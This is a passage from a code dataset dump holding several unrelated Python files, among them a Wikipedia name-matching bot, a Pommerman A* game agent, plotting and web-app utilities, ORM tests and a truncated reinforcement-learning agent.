pagegenerators\nfrom pywikibot.pagegenerators import GeneratorFactory, parameterHelp\n\n#distance between strings\nfrom difflib import SequenceMatcher\n\n#strings:\nimport string\n\n#combibations of sets\nimport itertools\n\n#json\nimport json\n\n\nimport unicodedata\nimport datetime\n\n\n\n\n###\n#stackoverflow:begin\nimport re\nimport unicodedata\n\ndef StripAccents(text):\n    \"\"\"\n    Strip accents from input String.\n    :param text: The input string.\n    :type text: String.\n    :returns: The processed String.\n    :rtype: String.\n    \"\"\"\n    try:\n        text = unicode(text, 'utf-8')\n    except NameError: # unicode is a default on python 3 \n        pass\n    text = unicodedata.normalize('NFD', text)\n    text = text.encode('ascii', 'ignore')\n    text = text.decode(\"utf-8\")\n    return str(text)\n#Stackoverflow:end\n\n\ndef CompareFullNames(FullName, Name):\n\tNameList1 = StripAccents(FullName).split()\n\tNameList2 = StripAccents(Name).split()\n\n\tif '(' in NameList1[-1]:\n\t\tNameList1.pop()\n\n\tif '(' in NameList2[-1]:\n\t\tNameList2.pop()\n\n\tif len(NameList2) > len (NameList1): \n\t\treturn 0\n\n\tlenght = min(len(NameList1), len(NameList2))\n\n\tMaxScore = 0\n\tfor l in [lenght]:\n\t\tfor Combination1 in itertools.combinations(NameList1, l): \n\t\t\tfor Combination2 in itertools.combinations(NameList2, l): \n\t\t\t\tScore = 0\n\t\t\t\tMatchedWords = 0\n\t\t\t\tfor k in range(0, l):\t\t\t\n\t\t\t\t\tWordScore = SequenceMatcher(None,Combination1[k],Combination2[k]).ratio()\n\t\t\t\t\tif WordScore > .7: #A arbitrary number\n\t\t\t\t\t\tScore = Score + WordScore\n\t\t\t\t\t\tMatchedWords = MatchedWords + 1\n\t\t\t\tif MatchedWords==l:\n\t\t\t\t\tMaxScore = max (MaxScore, Score)\n\t\t\t\t\n\t\n\n\treturn MaxScore\n\n\ndef CompareNames(Name1, Name2):\n\tNameList1 = StripAccents(Name1).split()\n\tNameList2 = StripAccents(Name2).split()\n\n\tif '(' in NameList1[-1]:\n\t\tNameList1.pop()\n\n\tif '(' in NameList2[-1]:\n\t\tNameList2.pop()\n\n\tlenght = min(len(NameList1), len(NameList2))\n\n\tMaxScore = 0\n\tfor l in range(2, lenght+1):\n\t\tfor Combination1 in itertools.combinations(NameList1, l): \n\t\t\tfor Combination2 in itertools.combinations(NameList2, l): \n\t\t\t\tScore = 0\n\t\t\t\tMatchedWords = 0\n\t\t\t\tfor k in range(0, l):\t\t\t\n\t\t\t\t\tWordScore = SequenceMatcher(None,Combination1[k],Combination2[k]).ratio()\n\t\t\t\t\tif WordScore > .5: #A arbitrary number\n\t\t\t\t\t\tScore = Score + WordScore\n\t\t\t\t\t\tMatchedWords = MatchedWords + 1\n\t\t\t\tScore = Score - (lenght - MatchedWords) * 0.7 #A arbitrary penalization factor \n\t\t\t\tMaxScore = max (MaxScore, Score)\n\t\t\t\t\n\t\n\treturn MaxScore - abs (len(NameList1) - len(NameList2) ) * 0.2 #A arbitrary penalization factor\n\n\n\n#Look for articles about someone, treat search suggestions (no ideia how to retrieve them)\ndef HasArticle(FullName):\n\ttotal=10 #number of pages we are retrieving from Wikipedia\n\t#print (FullName)\n\tgen = pagegenerators.SearchPageGenerator(query=FullName, site=site, namespaces=[0], total=total)\n\tArticleList = []\n\n\t#Redirects = pagegenerators.RedirectFilterPageGenerator(gen, no_redirects=False)\n\n\t#Get list of titles and sring distance from FullName \t\n\tfor Article in gen:\n\t\tArticleTitle = Article.title()\n\t\tScore = CompareFullNames(FullName, ArticleTitle)\n\t\tArticleList.append ((Article, ArticleTitle, Score))\n\t\t#print(ArticleTitle)\n\n\tSortedArticleList = sorted (ArticleList, key = lambda ArticleList:-ArticleList[2])\n\t#print(SortedArticleList)ret\n\n\t#print(ArticleList)\n\tif SortedArticleList 
== []:\n\t\treturn False\n\n\tBestScore = SortedArticleList [0][2]\n\t#print (BestScore)\n\n\t#Magic number\n\tif BestScore < 1.5:\n\t\treturn False\n\treturn SortedArticleList [0][1]\n\n\n\n\n\n\n\n###\n\n\nmeses = {'jan':1, 'fev':2, 'mar':3, 'abr':4, 'mai':5, 'jun':6, 'jul':7, 'ago':8, 'set':9, 'out':10, 'nov':11, 'dez':12}\ndef parse(gender):\n\tfor number, name, link, birth, field, obs in Table:\n#\t\tprint (birth)\t\n\t\tpos = birth.find(' ')\n\t\tbirth = birth[pos+1:]\n\t\tpos = birth.find(' ')\n\t\tdia = int(birth[:pos].replace('º',''))\n\t\tif dia>0:\t\n\t\t\tpos = birth.find('de')\n\t\t\tmes = meses.get(birth[pos+3:pos+6].lower())\n\t\t\tano = int(birth[pos+10:pos+14])\n\t\t\t#birth = datetime.datetime(ano, mes, dia)\n\t\t\tbirth = [ano, mes, dia] \n\t\telse:\n\t\t\tmes = 0\n\t\t\tano = 0\n\t\t\tbirth = None\n\n\t\tArticle = name #HasArticle (name) ############## \n\t\tif Article == False:\n\t\t\tprint (name, \" XXXX\")\n\t\t\tArticleName = 'X'\n\t\telse:\n\t\t\tprint (name, \"s\",Article.title())\n#\t\t\tNumberOfExistingArticles = NumberOfExistingArticles + 1\n\t\t\tArticleName = Article\n\n\n\n\t\tNewTable.append([number, gender, name, link, birth, field, obs, ArticleName])\n\t\n\n\nsite = pywikibot.Site('pt', 'wikipedia')\n\n\n\nNewTable=[]\nifile = open('lista_abc_masculino.json', 'r')\nTable = json.loads(ifile.read())\nifile.close()\n\nparse('M')\n\nifile = open('lista_abc_feminino.json', 'r')\nTable = json.loads(ifile.read())\nifile.close()\nparse('F')\n\n\nprint (len(NewTable))\n\n#print(NewTable)\nquit()\nofile=open('tabela_com_sugestoes.json','w')\njson.dump(NewTable, ofile)\nofile.close()\n","sub_path":"abc/polish.py","file_name":"polish.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"521438951","text":"from collections import defaultdict\nimport queue\nimport random\nimport math\nfrom enum import Enum\n\nimport numpy as np\n\nfrom . import BaseAgent\nfrom .. import constants\nfrom .. 
import utility\n\n\n# Code for A* pathfinding based off of this article\n# https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\nclass Node():\n    \"\"\"A node class for A* Pathfinding\"\"\"\n\n    def __init__(self, parent=None, position=None):\n        self.parent = parent\n        self.position = position\n\n        self.g = 0\n        self.h = 0\n        self.f = 0\n\n    def __eq__(self, other):\n        return self.position == other.position\n\n    def __hash__(self):\n        return self.position.__hash__()\n\n\ndef astar(maze, start, end, passables):\n    \"\"\"Returns a list of tuples as a path from the given start to the given end in the given maze\"\"\"\n\n    # Create start and end node\n    start_node = Node(None, start)\n    start_node.g = start_node.h = start_node.f = 0\n    end_node = Node(None, end)\n    end_node.g = end_node.h = end_node.f = 0\n\n    # Initialize both open and closed list\n    open_list = set()\n    closed_list = set()\n\n    # Add the start node\n    open_list.add(start_node)\n\n    # Loop until you find the end\n    while len(open_list) > 0:\n\n        # Get the current node\n        current_node = min(open_list, key=lambda n: n.f)\n        open_list -= {current_node}\n\n        # Pop current off open list, add to closed list\n        closed_list.add(current_node)\n        # Found the goal\n        if current_node == end_node:\n            path = []\n            current = current_node\n            while current is not None:\n                path.append(current.position)\n                current = current.parent\n            return path[::-1] # Return reversed path\n\n        # Generate children\n        children = []\n        for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0)]: # Adjacent squares\n\n            # Get node position\n            node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n\n            # Make sure within range\n            if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0:\n                continue\n\n            # Make sure walkable terrain\n            if maze[node_position[0]][node_position[1]] not in passables:\n                continue\n\n            # Create new node\n            new_node = Node(current_node, node_position)\n\n            # Append\n            children.append(new_node)\n\n        # Loop through children\n        for child in children:\n\n            # Child is on the closed list\n            if child in closed_list:\n                continue\n\n            # Create the f, g, and h values\n            child.g = current_node.g + 1\n            child.h = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)\n            child.f = child.g + child.h\n\n            # Child is already in the open list\n            flag = False\n            for open_node in open_list:\n                if child == open_node and child.g > open_node.g:\n                    flag = True\n            if flag:\n                continue\n\n            # Add the child to the open list\n            open_list.add(child)\n\n\nclass JukeBot(BaseAgent):\n\n    class Desires(Enum):\n        FLEE = 0\n        KILL = 1\n        POWER_UP = 2\n        CLEAR_ENV = 3\n        HIDE = 4\n\n    def __init__(self, *args, **kwargs):\n        super(JukeBot, self).__init__(*args, **kwargs)\n        self.action_queue = queue.PriorityQueue()\n\n        self.beliefs = {'position': (), 'obs': [], 'threats': [], 'powerups': [], 'neighbors':[], 'enemies': [], 'wood': [], 'routes': {}}\n        self.desires = [JukeBot.Desires.POWER_UP]\n        self.intentions = {'go_to': None, 'avoid': [], 'drop_bomb_at': None, 'wait': None}\n        self.current_plan = []\n\n    def is_threatened(self, obs, posn):\n        r, c = posn\n\n        #TODO: go back and look at distance vs bomb strength\n\n        # find any bombs in the same row/col as this space\n        for b_c in range(10):\n            if obs['bomb_life'][r, b_c] > 0 or obs['flame_life'][r, b_c] > 0:\n                return True\n        for b_r in range(10):\n            if obs['bomb_life'][b_r, c] or obs['flame_life'][b_r, c] > 0:\n                return 
True\n\n        # check whether or not there's flames here\n        if (constants.Item.Flames.value == obs['board'][r,c]) or obs['bomb_life'][r,c] > 0:\n            return True\n\n        return False\n\n    # Find spaces that threaten us\n    def find_threatened_spaces(self, obs):\n        threatened = set()\n        for r in range(len(obs['board'])):\n            for c in range(len(obs['board'])):\n                if self.is_threatened(obs, (r,c)):\n                    threatened.add((r, c))\n        return threatened\n    \n    # Get the spaces adjacent to us\n    def get_neighbors(self, obs,posn):\n        neighbors = []\n        BOARD_SIZE =10\n        r,c = posn\n\n        if r < BOARD_SIZE-1:\n            neighbors.append((r+1,c,obs[\"board\"][r+1,c]))\n        \n        if r > 0:\n            neighbors.append((r-1,c,obs[\"board\"][r-1,c]))\n\n        if c < BOARD_SIZE-1:\n            neighbors.append((r,c+1,obs[\"board\"][r,c+1]))\n\n        if c > 0:\n            neighbors.append((r,c-1,obs[\"board\"][r,c-1]))\n\n        return neighbors\n    \n    # Returns back board locations of certain objects\n    def find_objects(self,obs,item_types):\n        found_items = []\n        for r in range(len(obs['board'])):\n            for c in range(len(obs['board'][0])):\n                if obs['board'][r,c] in item_types:\n                    found_items.append( (r, c) )\n\n        return found_items\n\n    power_ups = [constants.Item.ExtraBomb.value, constants.Item.IncrRange.value, constants.Item.Kick.value]\n    passables = power_ups + [constants.Item.Passage.value]\n\n    # Change our current beliefs of the world\n    def brf(self,beliefs,obs):\n        r, c = obs['position']\n\n        beliefs['obs'] = obs\n        beliefs['position'] = (r,c)\n        beliefs['neighbors'] = self.get_neighbors(obs,beliefs['position'])\n        beliefs['threatened'] = self.find_threatened_spaces(obs)\n\n        # Only list powerups that are within range\n        power_up_list = self.find_objects(obs,JukeBot.power_ups)\n        power_up_paths = {power_up: astar(beliefs['obs']['board'], beliefs['position'], power_up, JukeBot.passables) for power_up in power_up_list}\n\n        valid_powerups = []\n        for power_up in power_up_paths:\n            if power_up_paths[power_up]:\n                valid_powerups.append(power_up)\n\n        \n        beliefs['powerups'] = valid_powerups\n\n        beliefs['enemies'] = self.find_objects(obs, obs['enemies'])\n        beliefs['wood'] = self.find_objects(obs, [constants.Item.Wood.value])\n\n        return beliefs\n\n    ##TODO: Fix where there's wood left but its impossible to reach and we don't start fleeing.\n\n    # See if our intention makes sense\n    def reconsider(self, intentions, beliefs):\n        dest = intentions['go_to']\n        \n        if dest and dest in beliefs['threatened']:\n            return True\n\n        #if next move is threatned\n        if dest and dest == beliefs['position']:\n            intentions['go_to'] = None\n            return True\n        \n        bomb_dest = intentions['drop_bomb_at']\n        if bomb_dest and beliefs['obs']['bomb_life'][bomb_dest[0], bomb_dest[1]] > 0:\n            intentions['drop_bomb_at'] = None\n            return True\n        \n    # If the given path contains a threat\n    def contains_threat(self, path, threats):\n        for node in path:\n            if node in threats:\n                return True\n\n    # Figure out what we should intend to do based off the world and out desires\n    def intention_filter(self, beliefs, desires, intentions):\n\n        # If we are already at a place we we're intending to go to\n        dest = intentions['go_to']\n        if dest and dest == beliefs['position']:\n            intentions['go_to'] = None\n\n        # If we already dropped a bomb at a place we wanted to drop a bomb at\n        bomb_dest = intentions['drop_bomb_at']\n        if bomb_dest and beliefs['obs']['bomb_life'][bomb_dest[0], bomb_dest[1]] > 0:\n            intentions['drop_bomb_at'] = None\n\n        # If we want to FLEE\n        if desires[0] == JukeBot.Desires.FLEE:\n            # Find nearest spot that's empty and not in threats\n            safe_spots = 
set(self.find_objects(beliefs['obs'], [constants.Item.Passage.value])) - beliefs['threatened']\n            paths = {location: astar(beliefs['obs']['board'], beliefs['position'], location[0:2], JukeBot.passables+[constants.Item.Bomb.value]) for location in safe_spots}\n            \n            # Go to that spot\n            if paths:\n                nearest_safe = min(paths, key=lambda p: len(paths[p]) if paths[p] else np.Infinity)\n                dest = nearest_safe[0:2]\n                intentions['go_to'] = dest\n                beliefs['routes'][dest] = paths[nearest_safe] \n\n        # If we want to POWERUP\n        elif desires[0] == JukeBot.Desires.POWER_UP and beliefs['powerups']:\n            # Find a path to all the powerups\n            paths = {powerup: astar(beliefs['obs']['board'], beliefs['position'], powerup[0:2], JukeBot.passables) for powerup in beliefs['powerups']}\n            \n            if paths:\n                # Take the shortest path\n                nearest_powerup = min(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else np.Infinity)\n                dest = nearest_powerup[0:2]\n                path = paths[nearest_powerup]\n\n                # If the path contatins a threat, wait\n                if path and self.contains_threat(path,beliefs['threatened']):\n                    intentions['wait'] = True\n\n                intentions['go_to'] = dest\n                beliefs['routes'][dest] = paths[nearest_powerup] \n\n        # If we want to CLEAR THE ENVIRONMENT\n        elif desires[0] == JukeBot.Desires.CLEAR_ENV and beliefs['wood']:\n            # Find the paths to wood on the board\n            \n            paths = {wood: astar(beliefs['obs']['board'], beliefs['position'], wood[0:2], JukeBot.passables+[constants.Item.Wood.value]) for wood in beliefs['wood']}\n            if paths:\n\n                # Find the closest\n                nearest_wood = min(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else np.Infinity) \n\n                # However, we should check to see if that space is threatened\n                path = paths[nearest_wood]\n                if path and self.contains_threat(path,beliefs['threatened']):\n                    intentions['wait'] = True\n\n                if path:\n                    # We also just drop the bomb at the adjacent space, not the actual wood space\n                    path.pop()\n                    dest = path[-1]\n\n                    intentions['go_to'] = dest\n                    intentions['drop_bomb_at'] = dest\n                    beliefs['routes'][dest] = path\n\n        # Killing is wrong, and bad. \n        # There should be a new, stronger word for killing like badwrong or badong. 
\n        # YES, killing is badong!\n        # From this moment, I will stand for the opposite of killing, gnodab.\n        elif desires[0] == JukeBot.Desires.KILL:\n            pass\n\n        # If we desire to HIDE from the enemy\n        elif desires[0] == JukeBot.Desires.HIDE:\n            safe_spots = set(self.find_objects(beliefs['obs'], [constants.Item.Passage.value])) - beliefs['threatened']\n            found_enemy = self.find_objects(beliefs['obs'], [enemy.value for enemy in beliefs['obs']['enemies']])[0]\n            paths = {location: astar(beliefs['obs']['board'], found_enemy, location[0:2], JukeBot.passables+[constants.Item.Bomb.value]) for location in safe_spots}\n            \n            if paths:\n                farthest_path_location = max(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else -np.Infinity)\n                path_to_farthest_location = astar(beliefs['obs']['board'], beliefs['position'], farthest_path_location, JukeBot.passables)\n                dest = farthest_path_location\n\n                if path_to_farthest_location and self.contains_threat(path_to_farthest_location,beliefs['threatened']):\n                    intentions['wait'] = True\n                \n                intentions['go_to'] = dest\n                beliefs['routes'][dest] = path_to_farthest_location \n\n        return intentions\n\n    # Take an A* path of squares and turn it into a list of actions for the agent\n    def path_to_actions(self, path):\n        actions = []\n        for i in range(1,len(path)):\n            r_l, c_l = path[i - 1]\n            r, c = path[i]\n\n            delta = (r - r_l, c - c_l)\n            if delta == (-1, 0):\n                actions.append(constants.Action.Up)\n            elif delta == (1,0):\n                actions.append(constants.Action.Down)\n            elif delta == (0,1):\n                actions.append(constants.Action.Right)\n            elif delta == (0,-1):\n                actions.append(constants.Action.Left)\n\n        # Reverse the order of the actions, so we can pop them properly\n        return actions[::-1]\n\n    # Make a plan to achieve our intentions\n    def plan(self, beliefs, intentions):\n        actions = []\n\n        # If we intend to wait, do nothing\n        if intentions['wait']:\n            intentions['wait'] = None\n            return [constants.Action.Stop]\n\n        # If we indend to go somewhere, pathfind\n        elif intentions['go_to']:\n            r,c = dest = intentions['go_to']\n            if beliefs['routes'][dest]:\n                actions = self.path_to_actions(beliefs['routes'][dest])\n            \n            # Drop a bomb if we intend to\n            if intentions['drop_bomb_at'] == dest:\n                actions.insert(0,constants.Action.Bomb.value)\n\n            beliefs['routes'][dest] == None\n        \n        # Else, we just stop\n        if actions:\n            return actions\n        else:\n            return [constants.Action.Stop]\n\n    # Is our plan OK? 
(Will it get us killed?)\n    def sound(self, current_plan, intentions, beliefs):\n\n        # If our next move in the plan puts us in danger, replan\n        if intentions['go_to']:\n            dest = intentions['go_to']\n            next_move = current_plan[-1]\n            r,c = beliefs['position']\n            next_pos = (r,c)\n\n            if next_move == constants.Action.Up:\n                next_pos = (r-1,c)\n            elif next_move == constants.Action.Down:\n                next_pos = (r+1,c)\n            elif next_move == constants.Action.Left:\n                next_pos = (r,c-1)\n            elif next_move == constants.Action.Right:\n                next_pos = (r,c+1)\n\n            if next_pos in beliefs['threatened']:\n                safe_board = beliefs['obs']['board'].copy()\n\n                for r in range(len(safe_board)):\n                    for c in range(len(safe_board[0])):\n                        if (r,c) in beliefs['threatened']:\n                            safe_board[r,c] = constants.Item.Rigid.value\n\n                new_path = astar(safe_board, beliefs['position'], dest, JukeBot.passables)\n                beliefs['routes'][dest] = new_path\n                return False\n\n        # Also reconsider if we don't actually have a plan\n        return len(current_plan) > 0\n\n    # Set our desires based off of our beliefs and intentions\n    def options(self, beliefs, intentions):\n        # Most important: if we think we are threatened, get out of danger!\n        if beliefs['position'] in beliefs['threatened']:\n            return [JukeBot.Desires.FLEE]\n\n        #If there's a powerup we can get to, go get it!\n        elif beliefs['powerups']:\n            return [JukeBot.Desires.POWER_UP]\n\n        #If there's still wood to be cleared, clear it!\n        elif beliefs['wood']:\n            return [JukeBot.Desires.CLEAR_ENV]\n\n        #We're pacifists, so run away if there's nothing better to do!\n        else:\n            return [JukeBot.Desires.HIDE]\n\n    def act(self,obs,action_space):\n        # A custom agent using the BDI arch.\n\n        self.beliefs = self.brf(self.beliefs, obs)\n\n        #If we don't have a plan, or we reconsider our current plan, change desires and intentions\n        if not self.current_plan or self.reconsider(self.intentions, self.beliefs):\n            self.desires = self.options(self.beliefs, self.intentions)\n            self.intentions = self.intention_filter(self.beliefs, self.desires, self.intentions)\n        \n        #If our current plan is not sound, revise current plan\n        if not self.current_plan or not self.sound(self.current_plan, self.intentions, self.beliefs):\n            self.current_plan = self.plan(self.beliefs, self.intentions)\n\n        debug = False\n        if debug:\n            print(\"D:\",self.desires)\n            print(\"I:\",self.intentions)\n            print(\"Pos:\",self.beliefs['position'])\n            print(\"Plan:\",self.current_plan)\n            print(\"---------\")\n\n        #This is in case something slips through\n        #If we don't have anything to do, just do nothing \n        if len(self.current_plan) == 0:\n            self.current_plan.append([constants.Action.Stop])\n\n        return self.current_plan.pop()\n\n\n","sub_path":"pommerman/agents/juke_bot.py","file_name":"juke_bot.py","file_ext":"py","file_size_in_byte":17498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"161691769","text":"import math\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# -----------------------------------------------------------------------\n# Importing data into dataframes\n# ==================================\n# if \"space(s)\" are used as delimiter in data, add following argument \"delim_whitespace=True\"\n# ex) df1 = pd.read_csv(\"s1.csv\", delim_whitespace=True)\n\ndf1 = pd.read_csv(\"sample.csv\")\n# df2 = pd.read_csv(\"2.csv\")\n# df3 = pd.read_csv(\"3.csv\")\n# -----------------------------------------------------------------------\n\n# 
-----------------------------------------------------------------------\n# Figure configrations\n# ==================================\n# if you want to set the size of the figure\n# use plt.figure(figsize=(width_inch,height_inch)) 1inch = 2.54cm\n# ==================================\n\nfig = plt.figure()\nplt.rcParams['font.family'] = 'Times New Roman' # fonts\nplt.rcParams['font.size'] = 14 # fontsize\nplt.rcParams['axes.linewidth'] = 1.5 # linewidth of axes\nplt.rcParams['text.usetex'] = True\n# usetex = True: latex description can be used in the figure\n# ex) ax1.set_xlabel(r'$ LATEX DESCRIPTION $')\n# note: if the system says \"type1ec.sty or dvipng is not found\",\n# install them using \"apt install cm-super\" or \"apt install dvipng.\" (Ubuntu)\n# If errors do not go away, set \"plt.rcParams['text.usetex'] = False\"\n\n# -----------------------------------------------------------------------\n# Add subplots to draw multiple graphs in the same figure\n# ==================================\n# add_subplots(i,j,k): define the number and places of the graph\n# i: number of lines in the figure\n# j: number of rows in the figure\n# k: order of the graph in the figure\n# ==================================\n\nax1 = fig.add_subplot(4, 1, 1)\nax2 = fig.add_subplot(4, 1, 2)\nax3 = fig.add_subplot(4, 1, 3)\nax4 = fig.add_subplot(4, 1, 4)\n\n# -----------------------------------------------------------------------\n# Drawing graphs\n# ==================================\nxlim = [0, 5]  # xrange for all plots\n\n# 1st plot\nax1.plot(df1[\"time\"], df1[\"angle\"], label=\"angle\", lw=1)\nax1.set_xlim(xlim)  # set xrange of the plot: ax1.set_xlim([a,b])\n# ax1.set_ylim()  # set yrange of the plot: ax1.set_ylim([a,b])\n# ax1.set_xlabel('time[sec]')\nax1.set_ylabel('Angle [deg]')\nax1.legend()  # add a legend(label) of the plot\n\n# 2nd plot\nax2.plot(df1[\"time\"], df1[\"velocity\"], label=\"vel.\", lw=1)\nax2.set_xlim(xlim)\n# ax1.set_ylim()\n# ax2.set_xlabel('time[sec]')\nax2.set_ylabel('Velocity [deg/sec]')\nax2.legend()\n\n# 3rd plot\nax3.plot(df1[\"time\"], df1[\"acceleration\"], label=\"accel.\", lw=1)\nax3.set_xlim(xlim)\n# ax1.set_ylim()\n# ax3.set_xlabel('time[sec]')\nax3.set_ylabel(r'${\\rm Acceleration}\\ [{\\rm deg}/{\\rm sec}^2]$')\nax3.legend()\n\n# 4th plot\nax4.plot(df1[\"time\"], df1[\"state\"], label=\"state\", lw=1)\nax4.set_xlim(xlim)\n# ax1.set_ylim()\nax4.set_xlabel('Time[sec]')\nax4.set_ylabel('State')\nax4.legend()\n# -----------------------------------------------------------------------\n\nfig.align_labels()  # align all labels\nplt.show()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"367000242","text":"from typing import Iterable\nimport random\n\nfrom movie_web_app.adapters.repository import AbstractRepository\nfrom movie_web_app.domainmodel.model import Movie\n\n\ndef get_genre_names(repo: AbstractRepository):\n    genres = repo.get_genre_list()\n    genre_name = [genre.genre_name for genre in genres]\n    return genre_name\n\n\ndef get_years(repo: AbstractRepository):\n    years = repo.get_year_list()\n    year_list = [year for year in years]\n    return year_list\n\n\ndef get_random_movies(quantity, repo: AbstractRepository):\n    movie_count = repo.get_number_of_movies()\n    print(\"movie count\", movie_count)\n\n    if quantity >= movie_count:\n        # Reduce the quantity of ids to generate if the repository has an insufficient number of articles.\n        quantity = 
movie_count - 1\n\n    # Pick distinct and random articles.\n    random_ids = random.sample(range(1, movie_count), quantity)\n    movies = repo.get_movies_by_id(random_ids)\n\n    return movies_to_dict(movies)\n\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef movie_to_dict(movies: Movie):\n    movie_dict = {\n        'year': movies.year,\n        'title': movies.title,\n        'description': movies.description,\n        'vote': movies.votes,\n        'rate': movies.rating\n        # 'image_hyperlink': movies.image_hyperlink\n    }\n    return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie]):\n    return [movie_to_dict(movies) for movies in movies]\n","sub_path":"movie_web_app/utilities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"280410042","text":"\nfrom sklearn import neighbors, datasets, preprocessing, cross_validation\nfrom numpy import linspace, mean\nboston = datasets.load_boston()\nX = boston.data\ny = boston.target\nX = preprocessing.scale( X )\nkf = cross_validation.KFold( len(y), shuffle=True, n_folds = 5, random_state=42)\n\n\npmax = 0\nresmax = 0\nfor p in linspace(1,10,200, True):\n    rgr = neighbors.KNeighborsRegressor( n_neighbors=5, weights='distance',p=p, metric='minkowski')\n    scores = cross_validation.cross_val_score( estimator = rgr, X = X, y = y, cv = kf, scoring='mean_squared_error')\n    res = mean(scores)\n    print( p, res )\n    if ( pmax == 0 ) or ( res > resmax ):\n        pmax = p\n        resmax = res\nprint( pmax, resmax )\n\n","sub_path":"Coursera/w2l1a2/Housing.py","file_name":"Housing.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"587711945","text":"from tortoise.aggregation import Count\nfrom tortoise.contrib import test\nfrom tortoise.tests.testmodels import Event, Team, Tournament\n\n\nclass TestRelations(test.TestCase):\n    async def test_relations(self):\n        tournament = Tournament(name='New Tournament')\n        await tournament.save()\n        await Event(name='Without participants', tournament_id=tournament.id).save()\n        event = Event(name='Test', tournament_id=tournament.id)\n        await event.save()\n        participants = []\n        for i in range(2):\n            team = Team(name='Team {}'.format(i + 1))\n            await team.save()\n            participants.append(team)\n        await event.participants.add(participants[0], participants[1])\n        await event.participants.add(participants[0], participants[1])\n\n        self.assertEqual([team.id for team in event.participants], [])\n\n        teamids = []\n        async for team in event.participants:\n            teamids.append(team.id)\n        self.assertEqual(teamids, [participants[0].id, participants[1].id])\n\n        self.assertEqual(\n            [team.id for team in event.participants],\n            [participants[0].id, participants[1].id]\n        )\n\n        self.assertEqual(event.participants[0].id, participants[0].id)\n\n        selected_events = await Event.filter(\n            participants=participants[0].id\n        ).prefetch_related('participants', 'tournament')\n        self.assertEqual(len(selected_events), 1)\n        self.assertEqual(selected_events[0].tournament.id, tournament.id)\n        self.assertEqual(len(selected_events[0].participants), 2)\n        await participants[0].fetch_related('events')\n        self.assertEqual(participants[0].events[0], event)\n\n        await Team.fetch_for_list(participants, 'events')\n\n        await Team.filter(events__tournament__id=tournament.id)\n\n        await Event.filter(tournament=tournament)\n\n        await 
Tournament.filter(events__name__in=['Test', 'Prod']).distinct()\n\n        result = await Event.filter(id=event.id).values('id', 'name', tournament='tournament__name')\n        self.assertEqual(result[0]['tournament'], tournament.name)\n\n        result = await Event.filter(id=event.id).values_list('id', 'participants__name')\n        self.assertEqual(len(result), 2)\n\n    async def test_reset_queryset_on_query(self):\n        tournament = await Tournament.create(name='New Tournament')\n        event = await Event.create(name='Test', tournament_id=tournament.id)\n        participants = []\n        for i in range(2):\n            team = await Team.create(name='Team {}'.format(i + 1))\n            participants.append(team)\n        await event.participants.add(*participants)\n        queryset = Event.all().annotate(count=Count('participants'))\n        await queryset.first()\n        await queryset.filter(name='Test').first()\n","sub_path":"tortoise/tests/test_relations.py","file_name":"test_relations.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"235130741","text":"def s(n):\n    l=[]\n    limit=int(n**0.5)+1\n    for i in range(2,limit+1):\n        while n%i==0:\n            l.append(i)\n            n=n//i\n    if n>1:l.append(n)\n    return(l)\n    \nN=int(input())\n\nans=s(N)\nprint(str(N) + \": \" + ' '.join(map(str,ans)))","sub_path":"初中級者が解くべき過去問精選100/068_素数判定法_NTL_1_A - 素因数分解.py","file_name":"068_素数判定法_NTL_1_A - 素因数分解.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"443486236","text":"#######################################################################\n# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com)    #\n# Permission given to modify the code as long as you keep this        #\n# declaration at the top                                              #\n#######################################################################\n\nfrom .BaseAgent import *\nfrom ..utils import *\n\nclass OptionD3PGAgent(BaseAgent):\n    def __init__(self, config):\n        BaseAgent.__init__(self, config)\n        self.config = config\n        self.task = config.task_fn()\n        self.network = config.network_fn(self.task.state_dim, self.task.action_dim)\n        self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)\n        self.target_network.load_state_dict(self.network.state_dict())\n        self.policy = config.policy_fn()\n\n        self.total_steps = 0\n        self.episode_rewards = np.zeros(config.num_workers)\n        self.last_episode_rewards = np.zeros(config.num_workers)\n        self.random_process = config.random_process_fn((config.num_workers, self.task.action_dim))\n\n        states = self.task.reset()\n        states = self.config.state_normalizer(states)\n        self.q_options, self.betas, self.actions = self.network.predict(states)\n        self.options = np.asarray([self.policy.sample(q) for q in to_numpy(self.q_options)])\n        self.is_initial_betas = np.ones(self.config.num_workers)\n        self.prev_options = np.copy(self.options)\n        self.states = states\n\n    def soft_update(self, target, src):\n        for target_param, param in zip(target.parameters(), src.parameters()):\n            target_param.detach_()\n            target_param.copy_(target_param * (1.0 - self.config.target_network_mix) +\n                               param * self.config.target_network_mix)\n\n    def iteration(self):\n        config = self.config\n        rollout = []\n\n        states = self.states\n        q_options, betas, options, actions = 